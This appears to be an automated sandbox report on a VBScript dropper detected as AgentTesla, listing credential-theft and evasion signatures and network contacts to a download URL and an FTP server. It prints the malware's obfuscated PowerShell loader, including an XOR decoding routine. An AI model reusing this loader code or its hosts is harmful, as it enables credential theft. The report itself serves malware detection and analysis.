Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name: TT_COPY.vbs
Analysis ID: 758166
MD5: a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1: d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256: 28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
Infos:

Detection

AgentTesla
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.31.121.136 185.31.121.136
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
Uses FTP
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49825 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://OowQOv.com
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po
Source: powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2457016446.0000026AAE735000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.2456250636.0000026AAE70A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wNUxderhdqerb.org
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: b3solutionscws.com
Source: global traffic HTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954 Jump to behavior
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC4280 7_2_00CC4280
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC1960 7_2_00CC1960
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5C38 7_2_00CD5C38
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD79E0 7_2_00CD79E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5128 7_2_00CD5128
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB930 7_2_00CDB930
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDEC8 7_2_00CDDEC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDA77 7_2_00CDDA77
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDC323 7_2_00CDC323
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD4500 7_2_00CD4500
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC180 7_2_00DAC180
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F824FA0 7_2_1F824FA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F82D720 7_2_1F82D720
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F827AE0 7_2_1F827AE0
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFDA NtQuerySystemInformation, 7_2_1D45AFDA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFB8 NtQuerySystemInformation, 7_2_1D45AFB8
Java / VBScript file with very long strings (likely obfuscated code)
Source: TT_COPY.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 